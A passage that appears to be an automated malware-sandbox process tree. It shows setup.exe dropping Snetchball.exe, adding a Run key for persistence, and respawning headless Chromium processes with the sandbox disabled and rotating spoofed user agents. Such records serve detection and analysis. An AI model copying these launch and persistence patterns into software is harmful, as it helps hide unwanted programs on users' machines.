C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2572 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exeC:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Modifies Control Panel
PID:1664 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2856 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:27⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2412 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2952 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5640 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2976 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1276 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1428 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3148 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3484 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
- Modifies Control Panel
PID:5308 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies Control Panel
PID:6288 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2820 --field-trial-handle=2824,i,497458667817038521,11437422347205369093,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:210⤵
- Executes dropped EXE
PID:3176 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3112 --field-trial-handle=2824,i,497458667817038521,11437422347205369093,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:810⤵
- Executes dropped EXE
PID:6780 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2824,i,497458667817038521,11437422347205369093,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:810⤵
- Executes dropped EXE
PID:6808 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=2824,i,497458667817038521,11437422347205369093,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:110⤵
- Executes dropped EXE
PID:6840 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=2824,i,497458667817038521,11437422347205369093,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:110⤵
- Executes dropped EXE
PID:6848 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
- Modifies Control Panel
PID:6376 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies Control Panel
PID:3508 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2876 --field-trial-handle=2880,i,11934877195413615712,15507049701759003266,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:213⤵
- Executes dropped EXE
PID:3364 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3124 --field-trial-handle=2880,i,11934877195413615712,15507049701759003266,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:813⤵
- Executes dropped EXE
PID:3056 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3176 --field-trial-handle=2880,i,11934877195413615712,15507049701759003266,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:813⤵
- Executes dropped EXE
PID:908 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3252 --field-trial-handle=2880,i,11934877195413615712,15507049701759003266,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵
- Executes dropped EXE
PID:5712 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3424 --field-trial-handle=2880,i,11934877195413615712,15507049701759003266,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵
- Executes dropped EXE
PID:2400 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
- Executes dropped EXE
- Modifies Control Panel
PID:7076 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
PID:6436 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2796 --field-trial-handle=2800,i,9257376146485230935,3735557170804219864,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:216⤵PID:7152
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2940 --field-trial-handle=2800,i,9257376146485230935,3735557170804219864,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:816⤵PID:5372
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2952 --field-trial-handle=2800,i,9257376146485230935,3735557170804219864,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:816⤵PID:4988
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3120 --field-trial-handle=2800,i,9257376146485230935,3735557170804219864,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵PID:5400
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
- Modifies Control Panel
PID:680 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
- Drops file in Windows directory
- Modifies Control Panel
PID:880 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2756 --field-trial-handle=2764,i,8143926454750315634,5060155449748382924,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:219⤵PID:5160
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2764,i,8143926454750315634,5060155449748382924,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:819⤵PID:5468
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3120 --field-trial-handle=2764,i,8143926454750315634,5060155449748382924,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:819⤵PID:6576
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=2764,i,8143926454750315634,5060155449748382924,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵PID:3584
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=2764,i,8143926454750315634,5060155449748382924,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵PID:2320
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵PID:5644
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵PID:2976
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵PID:5632
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵PID:4216
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵PID:6168
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵PID:6304
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵PID:796
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵PID:4864
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵PID:5316
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3132 --field-trial-handle=2800,i,9257376146485230935,3735557170804219864,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵PID:5596
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4148 --field-trial-handle=2800,i,9257376146485230935,3735557170804219864,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵PID:6648
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵PID:4148
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵PID:2892
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵PID:1912
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵PID:6068
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵PID:1468
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵PID:6304
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵PID:5448
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵PID:6456
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵PID:4028
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵PID:4876
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
PID:7104 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
PID:5212 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
PID:4180 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
PID:5496 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
PID:3460 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
PID:5592 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
PID:3728 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
PID:2896 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
PID:1496 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
- Executes dropped EXE
PID:6232 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
- Executes dropped EXE
PID:6328 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
- Executes dropped EXE
PID:6340 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
- Executes dropped EXE
PID:6488 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
- Executes dropped EXE
PID:4456 -
